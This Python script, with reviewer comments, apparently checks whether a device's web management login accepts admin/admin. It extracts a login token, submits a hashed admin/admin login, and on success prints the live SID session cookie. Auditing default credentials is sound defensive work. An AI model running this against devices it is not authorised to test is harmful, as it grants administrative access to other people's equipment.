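# -*- encoding: utf-8 -*-
"""Check whether a web management login still accepts admin/admin.

The script fetches the login page, extracts the ``Frm_Logintoken`` value,
and submits one login attempt with the username ``admin`` and the password
``admin``. A positive result means the device accepts that pair, so its
administrator password should be changed.
"""
import base64
import hashlib
import random
import re
import traceback
from warnings import filterwarnings

import requests

# NOTE(review): this blanket filter silences every warning in the process,
# including the InsecureRequestWarning raised because the requests below are
# sent with verify=False. Narrow it if this module is imported elsewhere.
filterwarnings("ignore")


class POC:
    """Single-target check for the admin/admin login on a web login form."""

    # Token used when neither pattern matches the login page.
    # NOTE(review): the origin of "13" is not visible here; presumably a
    # value the firmware accepts by default. Confirm before relying on it.
    _FALLBACK_TOKEN = "13"

    def __init__(self, url):
        """Store the base URL (with a trailing slash) and build a session.

        Args:
            url: Base URL of the device's web interface.
        """
        self.url = url if url.endswith("/") else f"{url}/"
        self.s = requests.Session()
        self.s.headers.update({
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
            "Referer": url,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8"
        })

    def get_token(self):
        """Return the ``Frm_Logintoken`` value found on the login page.

        The page is searched first for the JavaScript assignment form and
        then for the HTML attribute form. If neither is present, the
        fallback token is returned.

        Returns:
            The token as a string of digits.
        """
        # verify=False: the TLS certificate is not validated, so the peer's
        # identity is not authenticated for this request.
        r = self.s.get(self.url, verify=False, allow_redirects=True, timeout=10)
        token_match = re.search(
            r'getObj\s*\(\s*"Frm_Logintoken"\s*\)\s*\.value\s*=\s*["\'](\d+)["\']',
            r.text,
            re.IGNORECASE,
        )
        if token_match:
            return token_match.group(1)
        fallback = re.search(r'name="Frm_Logintoken"\s*[^>]*value="(\d+)"', r.text)
        return fallback.group(1) if fallback else self._FALLBACK_TOKEN

    def verify(self):
        """Submit one admin/admin login and report whether it was accepted.

        Acceptance is detected by a 302 response whose ``Location`` header
        ends with ``start.ghtml``.

        Returns:
            True if the login was accepted, False if it was rejected or the
            request failed. (The original returned None in every case; a
            boolean lets audit tooling consume the result.)
        """
        try:
            token = self.get_token()
            rand_num = str(random.randint(10000000, 99999999))
            pwd = "admin"
            # The form sends md5(password + UserRandomNum). The random value
            # is chosen here on the client and sent with the digest.
            # NOTE(review): as far as this request shows, the digest is not
            # bound to a server-issued challenge. Confirm against the device.
            final_pwd = hashlib.md5((pwd + rand_num).encode()).hexdigest()
            data = {
                "frashnum": "",
                "action": "login",
                "Frm_Logintoken": token,
                "UserRandomNum": rand_num,
                "Username": "admin",
                "Password": final_pwd,
                "LoginId": "Login"
            }
            # Redirects are not followed, so the 302 itself can be inspected.
            resp = self.s.post(self.url, data=data, allow_redirects=False, verify=False, timeout=10)
            accepted = (
                resp.status_code == 302
                and resp.headers.get("Location", "").endswith("start.ghtml")
            )
            if accepted:
                # The SID value is a live session identifier: treat the
                # output of this script as sensitive.
                print(f"SID Cookie: {self.s.cookies.get('SID', '无')}")
                print("YES!! \n User:admin\n Pwd:admin\n")
            return accepted
        except Exception as e:
            # Best-effort check: report the failure rather than crash.
            traceback.print_exc()
            print(e)
            return False


if __name__ == "__main__":
    import sys

    # Fail with a usage message instead of an IndexError when no URL is given.
    if len(sys.argv) < 2:
        raise SystemExit(f"usage: {sys.argv[0]} <base-url>")
    POC(sys.argv[1]).verify()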